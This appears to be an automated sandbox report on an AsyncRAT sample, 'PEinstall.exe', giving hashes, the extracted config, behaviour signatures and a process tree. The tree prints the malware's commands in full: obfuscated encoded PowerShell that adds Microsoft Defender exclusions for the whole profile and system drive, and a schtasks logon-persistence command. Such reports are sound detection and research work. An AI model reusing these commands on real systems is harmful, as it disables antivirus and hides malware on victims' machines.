Analysis
- max time kernel: 139s
- max time network: 108s
- platform: windows10-ltsc_2021_x64
- resource: win10ltsc2021-20250314-en
- resource tags: arch:x64, arch:x86, image:win10ltsc2021-20250314-en, locale:en-us, os:windows10-ltsc_2021-x64, system
- submitted: 19/04/2025, 22:45
- Static task: static1
- Behavioral task: behavioral1
- Sample: PEinstall.exe
- Resource: win10ltsc2021-20250314-en
General
- Target: PEinstall.exe
- Size: 57KB
- MD5: ea80d619808889ea8edb799056a67bc1
- SHA1: de591d83c5e24498a294366205d0a12d2098385c
- SHA256: 2ebed6be66514b15e46f9b3afc93a20c9bbfb9aebba07128320b2e56c239e3d9
- SHA512: d7e43ccd9a2f4f0d959d49ddc089a90da4e7e00cde0480c849d5078cf6127d5a15f4229067170399e6722a574b43f2121f9cbc8b34768b844583adacaff07929
- SSDEEP: 1536:KERi5rR21kXfc3dLnUAfUgc2vZnmHYUTmu1ycX9D:3RV6EpUgcTmu1ycX9D
Malware Config
Extracted
- asyncrat 0.5.8
- Default
- 127.0.0.1:6606
- 127.0.0.1:7707
- 127.0.0.1:8808
- 127.0.0.1:2009
- jc1XWfeoz50P
- delay: 10
- install: true
- install_file: executor.exe
- install_folder: %Temp%
Signatures
- Asyncrat family
- Async RAT payload (1 IoC)
  - resource: behavioral1/files/0x0008000000028206-36.dat, yara_rule: family_asyncrat
- Checks computer location settings (2 TTPs, 2 IoCs)
  Looks up country code configured in the registry, likely geofence.
  - Key value queried: \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\Control Panel\International\Geo\Nation (PEinstall.exe)
  - Key value queried: \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\Control Panel\International\Geo\Nation (PEInstaller.exe)
- Executes dropped EXE (2 IoCs)
  - PID 5628 PEInstaller.exe
  - PID 4120 executor.exe
- Obfuscated Files or Information: Command Obfuscation (1 TTP)
  Adversaries may obfuscate content during command execution to impede detection.
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).
- System Location Discovery: System Language Discovery (1 TTP, 6 IoCs)
  Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
  - Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language (cmd.exe)
  - Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language (timeout.exe)
  - Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language (schtasks.exe)
  - Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language (executor.exe)
  - Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language (PEInstaller.exe)
  - Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language (cmd.exe)
- Checks SCSI registry key(s) (3 TTPs, 3 IoCs)
  SCSI information is often read in order to detect sandboxing environments.
  - Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 (taskmgr.exe)
  - Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A (taskmgr.exe)
  - Key value queried: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName (taskmgr.exe)
- Checks processor information in registry (2 TTPs, 2 IoCs)
  Processor information is often read in order to detect sandboxing environments.
  - Key opened: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 (taskmgr.exe)
  - Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString (taskmgr.exe)
- Delays execution with timeout.exe (1 IoC)
  - PID 3520 timeout.exe
- Scheduled Task/Job: Scheduled Task (1 TTP, 1 IoC)
  Schtasks is often used by malware for persistence or to perform post-infection execution.
  - PID 1724 schtasks.exe
- Suspicious behavior: EnumeratesProcesses (64 IoCs; repeated entries collapsed, 64 rows in total)
  - PID 964 powershell.exe (2 entries)
  - PID 5704 powershell.exe (2 entries)
  - PID 5628 PEInstaller.exe (repeated)
  - PID 5884 taskmgr.exe (repeated)
- Suspicious behavior: GetForegroundWindowSpam (1 IoC)
  - PID 5884 taskmgr.exe
- Suspicious use of AdjustPrivilegeToken (29 IoCs; grouped by process)
  - PID 964 powershell.exe: SeDebugPrivilege
  - PID 5704 powershell.exe: SeDebugPrivilege, SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36
  - PID 5628 PEInstaller.exe: SeDebugPrivilege
  - PID 4120 executor.exe: SeDebugPrivilege (2 entries)
  - PID 5884 taskmgr.exe: SeDebugPrivilege, SeSystemProfilePrivilege, SeCreateGlobalPrivilege
- Suspicious use of FindShellTrayWindow (64 IoCs)
  - PID 5884 taskmgr.exe (64 entries)
- Suspicious use of SendNotifyMessage (64 IoCs)
  - PID 5884 taskmgr.exe (64 entries)
- Suspicious use of WriteProcessMemory (22 IoCs; identical rows collapsed with their count, 22 rows in total)
  - PID 952 (PEinstall.exe) wrote to memory of 964, procid_target 82 (2 entries)
  - PID 952 (PEinstall.exe) wrote to memory of 5704, procid_target 84 (2 entries)
  - PID 952 (PEinstall.exe) wrote to memory of 5628, procid_target 86 (3 entries)
  - PID 5628 (PEInstaller.exe) wrote to memory of 4496, procid_target 95 (3 entries)
  - PID 5628 (PEInstaller.exe) wrote to memory of 4252, procid_target 97 (3 entries)
  - PID 4252 (cmd.exe) wrote to memory of 3520, procid_target 99 (3 entries)
  - PID 4496 (cmd.exe) wrote to memory of 1724, procid_target 100 (3 entries)
  - PID 4252 (cmd.exe) wrote to memory of 4120, procid_target 101 (3 entries)
Processes
- C:\Users\Admin\AppData\Local\Temp\PEinstall.exe (PID 952, depth 1)
  Command line: "C:\Users\Admin\AppData\Local\Temp\PEinstall.exe"
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 964, depth 2)
    Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcgBmACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHgAYwBxACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAVABoAGUAcgBlACAAdwBhAHMAIABhAG4AIABlAHIAcgBvAHIAIABlAHgAZQBjAHUAdABpAG4AZwAgAHQAaABpAHMAIABwAHIAbwBnAHIAYQBtAC4AIABDAG8AbgB0AGEAYwB0ACAAdABoAGUAIABhAHUAdABoAG8AcgAgAGYAbwByACAAbQBvAHIAZQAgAGkAbgBmAG8AcgBtAGEAdABpAG8AbgAuACcALAAnACcALAAnAE8ASwAnACwAJwBFAHIAcgBvAHIAJwApADwAIwB4AG0AYwAjAD4A"
    Decoded (base64 of UTF-16LE): <#brf#>Add-Type -AssemblyName System.Windows.Forms;<#xcq#>[System.Windows.Forms.MessageBox]::Show('There was an error executing this program. Contact the author for more information.','','OK','Error')<#xmc#>
    (Shows a fake error dialog as a decoy; the <#...#> block comments are junk padding inserted to break signature matching on the command line.)
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 5704, depth 2)
    Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbQBnACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGoAaQByACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGEAYQBzACMAPgA="
    Decoded (base64 of UTF-16LE): <#tmg#>Add-MpPreference <#jir#> -ExclusionPath @($env:UserProfile,$env:SystemDrive) <#vqg#> -Force <#aas#>
    (Adds Microsoft Defender exclusions covering the entire user profile and the system drive, which is why the process requests the elevated token privileges listed under AdjustPrivilegeToken; an Add-MpPreference -ExclusionPath call from a process tree like this one is a strong detection signal.)
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
  - C:\Users\Admin\AppData\Roaming\PEInstaller.exe (PID 5628, depth 2)
    Command line: "C:\Users\Admin\AppData\Roaming\PEInstaller.exe"
    - Checks computer location settings
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    - C:\Windows\SysWOW64\cmd.exe (PID 4496, depth 3)
      Command line: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "executor" /tr '"C:\Users\Admin\AppData\Local\Temp\executor.exe"' & exit
      - System Location Discovery: System Language Discovery
      - Suspicious use of WriteProcessMemory
      - C:\Windows\SysWOW64\schtasks.exe (PID 1724, depth 4)
        Command line: schtasks /create /f /sc onlogon /rl highest /tn "executor" /tr '"C:\Users\Admin\AppData\Local\Temp\executor.exe"'
        (Persistence: a logon-triggered scheduled task named "executor" running the dropped payload with highest privileges.)
        - System Location Discovery: System Language Discovery
        - Scheduled Task/Job: Scheduled Task
    - C:\Windows\SysWOW64\cmd.exe (PID 4252, depth 3)
      Command line: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpA7D9.tmp.bat""
      - System Location Discovery: System Language Discovery
      - Suspicious use of WriteProcessMemory
      - C:\Windows\SysWOW64\timeout.exe (PID 3520, depth 4)
        Command line: timeout 3
        - System Location Discovery: System Language Discovery
        - Delays execution with timeout.exe
      - C:\Users\Admin\AppData\Local\Temp\executor.exe (PID 4120, depth 4)
        Command line: "C:\Users\Admin\AppData\Local\Temp\executor.exe"
        - Executes dropped EXE
        - System Location Discovery: System Language Discovery
        - Suspicious use of AdjustPrivilegeToken
- C:\Windows\system32\taskmgr.exe (PID 5884, depth 1)
  Command line: "C:\Windows\system32\taskmgr.exe" /4
  - Checks SCSI registry key(s)
  - Checks processor information in registry
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
Network
MITRE ATT&CK Enterprise v16
Downloads
- Filesize: 3KB
  MD5: 3eb3833f769dd890afc295b977eab4b4
  SHA1: e857649b037939602c72ad003e5d3698695f436f
  SHA256: c485a6e2fd17c342fca60060f47d6a5655a65a412e35e001bb5bf88d96e6e485
  SHA512: c24bbc8f278478d43756807b8c584d4e3fb2289db468bc92986a489f74a8da386a667a758360a397e77e018e363be8912ac260072fa3e31117ad0599ac749e72
- Filesize: 1KB
  MD5: 92d8de91915c06ef75e47edc5511ed1c
  SHA1: 9be38cf8ff95bb34c0113d0779cb37b264c7c7ca
  SHA256: 11393033e57c6f12c10cb3b9962c44a44462141be15b6d3f78a7d2c8944fa416
  SHA512: d0025b0dca6bb63e31a44edfa0eb18cecbc7cd43c23b817e1f8cd002b56ee8eb8715cb5ed016008faf49420c445733ad1e4124bf2081b9dc05056881d7be6a5a
- Filesize: 60B
  MD5: d17fe0a3f47be24a6453e9ef58c94641
  SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
  SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
  SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
- Filesize: 155B
  MD5: 6e6fd9264e5dc1379a1a8cca23e4f35d
  SHA1: 1861722927cefb3fa929665f9cac7d86ea3d9f7d
  SHA256: e2a324298728d71f7bad805599624fd65274e18c7f25ea2550e29877a09cdd7b
  SHA512: 3c83e39201110d4b45c93f263c363acd95b7ac34acf928aa9c2f8201211fb0383a385cae519093e1293e688f184698ba18a00445689f534451b2b2d9616516d4
- Filesize: 48KB
  MD5: a96ef57452d73871dc1045b96fddcf96
  SHA1: 7a9b28306b0fc32d4281b756be5bc91f53234696
  SHA256: 2fd4684b115a4b607493596b7fba4d54ddc7d97aec1852fbd60d449f353c2902
  SHA512: 14db2977907baa98fe81f66fc0b44d360bee92d8b5e53527021fd9ef5f182e3aaa30e5e05ef95b0eac3d09b21074e89dee42c59d8a23b91a3dfa0c4871c3cd8e